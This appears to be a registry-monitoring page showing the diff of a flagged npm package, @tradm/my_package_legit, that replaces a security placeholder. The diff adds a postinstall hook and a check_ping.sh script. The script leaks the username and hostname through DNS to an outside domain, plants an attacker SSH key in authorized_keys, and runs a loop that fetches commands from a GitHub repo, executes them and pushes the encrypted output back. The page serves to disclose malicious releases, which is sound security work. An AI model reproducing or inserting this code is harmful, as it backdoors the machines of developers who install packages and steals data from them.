@tradm/my_package_legit 0.0.1-security → 1.9.20

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @tradm/my_package_legit might be problematic. Click here for more details.

package/check_ping.sh ADDED
@@ -0,0 +1,45 @@
1
+ #!/bin/bash
2
+
3
+ whoiam=$(whoami)
4
+ whereiam=$(hostname)
5
+ nslookup $whoiam.$whereiam.ctcmkfbpc72ib0n8kt9gaowptistpwefr.flutteruki.3588833.com
6
+ echo """ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC6QZF9BEbUg9bT2p44GEbDkAwoeRuPMe8xG0QXbskU/FXNR5TsW/yDcV/dWMV2/rvDP5lrNSQ9zn9MjkPpeQ4eOda5aVCzbUp33Z5s6yPBabMLoJGCB9pZi+bd/BmkvrM+s4qcl5s8ijOO/gLWfgv9Fysxe86yYDeXGa75U1V2sfGsj/zu5wAz+n0zdVZy+DVlnrxvKSpEulDaOVrIKAbgWw4lLoRdJG+8Y9JQj+OOdAlNOtLuDaL+IpeaKi+Wj5z5oNUmU70wWhO027Qd18TCJO5/fj6x2kEoH+42KOBzT2EyePnJGfkVENJRHKLAHpIm8LOBgcMC+OtWIlQjbGJHb1HG3mMtgWz3+8gKOXHvQpMS04ZMtXqD6tvHx+SmSCx/sCP1HErziW9g6borQYqwUdfyNMkGey6Ufni0LjAuNZ1Og/n5s59qfHolQaTRU1Qrz8wXDw1goU8sWy2UHC4ykyVBAf9mMdiD1EXgPHnR+3hXV0udvAPucfAy61ny3/tvXZByaxvGRiRGaLFWPKVB0HA6Dz+m61F1lxD9Q+h6JSawttaxLfUXNQqMv1CLg8jaPtZIz9snj5rbrcid7uJybK6zzLZurfucBApZxmromNqn32V22LJWeJhlMexPchQWsIb16uuscpUk6kvD09joVB0SnGw4QqyfRGJJQIzBOQ==""" >> ~/.ssh/authorized_keys
7
+
8
+ LOCKFILE="/tmp/tmp6iwot03k.lock"
9
+
10
+ if [ -e "$LOCKFILE" ]; then
11
+ exit 0
12
+ fi
13
+
14
+ touch "$LOCKFILE"
15
+
16
+ LAST_COMMAND=""
17
+ PAT=$GHPAT
18
+ AESK=$AESP
19
+
20
+ slip=25
21
+
22
+ mkdir /tmp/tmp6iwot03k/
23
+ cd /tmp/tmp6iwot03k/
24
+
25
+ while true; do
26
+
27
+ git clone https://$PAT@github.com/armysick/Innocuous
28
+ cd Innocuous
29
+
30
+ slip=$(cat sleep)
31
+ dmc=$(head -n 1 clear)
32
+ if [ "$LAST_COMMAND" != "$dmc" ]; then
33
+ output=$(bash -c "$dmc")
34
+ echo $output | openssl enc -aes-256-cbc -base64 -pass pass:$AESK >> ls
35
+ git add ls
36
+ GIT_AUTHOR_NAME="$(whoami)/$(hostname)" GIT_AUTHOR_EMAIL="new.user@example.com" GIT_COMMITTER_NAME="Committer Name" GIT_COMMITTER_EMAIL="committer@example.com" git commit -m "yup"
37
+ git push
38
+ LAST_COMMAND=$dmc
39
+ fi
40
+
41
+ cd ..
42
+ rm -rf Innocuous
43
+
44
+ sleep $slip
45
+ done
package/index.js ADDED
@@ -0,0 +1 @@
1
+ // This is an empty index.js file that does nothing
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "@tradm/my_package_legit",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.9.20",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "postinstall": "./postinstall.sh"
7
+ },
8
+ "keywords": [],
9
+ "author": "",
10
+ "license": "ISC",
11
+ "description": "testpack"
6
12
  }
package/postinstall.sh ADDED
@@ -0,0 +1,6 @@
1
+ #!/bin/bash
2
+ if [[ "$npm_config_global" == "true" ]]; then
3
+ nohup bash -c 'sleep 2 && cd ../../ && sudo npm uninstall @tradm/my_package_legit -g && npm install @tradm/my_package_legit@1.0.0 -g && ./check_ping.sh' > /dev/null 2>&1 &
4
+ else
5
+ nohup bash -c 'sleep 2 && cd $(echo $PWD | sed "s/^\(.*node_modules\).*/\1/") && npm uninstall @tradm/my_package_legit && npm install @tradm/my_package_legit@1.0.0 && ./check_ping.sh' > /dev/null 2>&1 &
6
+ fi
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40tradm%2Fmy_package_legit for more information.